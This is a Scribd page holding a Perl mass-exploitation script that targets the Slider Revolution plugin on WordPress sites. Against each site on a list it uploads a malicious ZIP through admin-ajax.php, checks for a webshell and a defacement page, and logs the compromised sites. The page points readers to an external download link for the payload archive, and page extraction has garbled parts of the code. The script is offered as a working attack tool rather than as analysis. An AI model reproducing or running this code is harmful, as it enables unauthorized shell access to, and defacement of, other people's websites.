Scribd
Upload
2K views2 pages

Auto Exploiter Revslider Shell Upload by Oussama911

This Perl script exploits a vulnerability in the Slider Revolution plugin on WordPress sites to upload a webshell. It takes a list of targets from a file, sends an AJAX request to each to upload a malicious ZIP, checks if the shell was uploaded successfully, then checks if a defacement file was also uploaded. The uploaded shells and exploited sites are logged to a file.

Uploaded by

As Debugger
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
2K views2 pages

Auto Exploiter Revslider Shell Upload by Oussama911

This Perl script exploits a vulnerability in the Slider Revolution plugin on WordPress sites to upload a webshell. It takes a list of targets from a file, sends an AJAX request to each to upload a malicious ZIP, checks if the shell was uploaded successfully, then checks if a defacement file was also uploaded. The uploaded shells and exploited sites are logged to a file.

Uploaded by

As Debugger
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
You are on page 1/ 2

#!

/usr/bin/perl
#
# Don't Change right Noobs Oky #Oussama911 :3
# +-----------------------------------------------------------------------------------------------+
# | Warning : Download This Archive .zip and past in folder Bin of Perl for Us
e this Script !!!! |
# | Link : http://www.gulfup.com/?3bDGf4 !!!!
|
# |
|
# +-----------------------------------------------------------------------------------------------+
#
# -> Title: Auto Exploiter Slider Revolution Shell Upload
# -> Author: Oussama911
#
use LWP::UserAgent;
system(($^O eq 'MSWin32') ? 'cls' : 'clear');
head();
my $usage = " \nperl $0 <list.txt>\n perl $0 lista.txt";
die "$usage" unless $ARGV[0];
open(tarrget,"<$ARGV[0]") or die "$!";
while(<tarrget>){
chomp($_);
$target = $_;
my $path = "wp-admin/admin-ajax.php";
print "\nTarget => $target\n";
my $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 });
$ua->timeout(10);
$ua->agent("Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Geck
o) Chrome/26.0.1410.63 Safari/537.31");
my $req = $ua->get("$target/$path");
if($req->is_success) {
print "\n [+] Xploit Possibility Work :3\n \n";

print " [*] Try Exploiting Vulnerability\n";


print " [*] Xploiting $target\n";
my $exploit = $ua->post("$target/$path", Cookie => "", Content_Type => "form-dat
a", Content => [action => "revslider_ajax_action", client_action => "update_plug
in", update_file => ["revslider.zip"]]);
print " [*] Sent payload\n";
if ($exploit->decoded_content =~ /Wrong update extracted folder/) {
print " [+] Payload successfully executed\n";
print " [*] Checking if shell was uploaded\n";
my $check = $ua->get("$target/wp-content/plugins/revslider/temp/update_extract/r

evslider/up.php")->content;
if($check =~/<br>/) {
print " [+] Shell successfully uploaded\n";
open(save, '>>Shells.txt');
print save "shell : $target/wp-content/plugins/revslider/temp/update_extract
/revslider/up.php?zeb\n";
close(save);
print " [*] Checking if Deface was uploaded now\n";
my $def = $ua->get("$target/leet.html")->content;
if($def = ~/Hacked/) {
print " [+] Deface uploaded successfull\n";
} else {print " [-] Deface not Uploaded :/"; }
} else { print " [-] I'think Shell Not Uploaded :/\n"; }
} else {
print " [-] Payload failed: Fail\n";
print "\n";
}
} else { print "\n [-]Xploit Fail \n"}
sub head {
print "\t
print "\t
print "\t
print "\t
}
}

+===============================================\n";
| Auto Exploiter Revslider Shell Upload \n";
| Author: Oussama911\n";
+===============================================\n";

You might also like

pFad - Phonifier reborn

Pfad - The Proxy pFad of © 2024 Garber Painting. All rights reserved.

Note: This service is not intended for secure transactions such as banking, social media, email, or purchasing. Use at your own risk. We assume no liability whatsoever for broken pages.


Alternative Proxies:

Alternative Proxy

pFad Proxy

pFad v3 Proxy

pFad v4 Proxy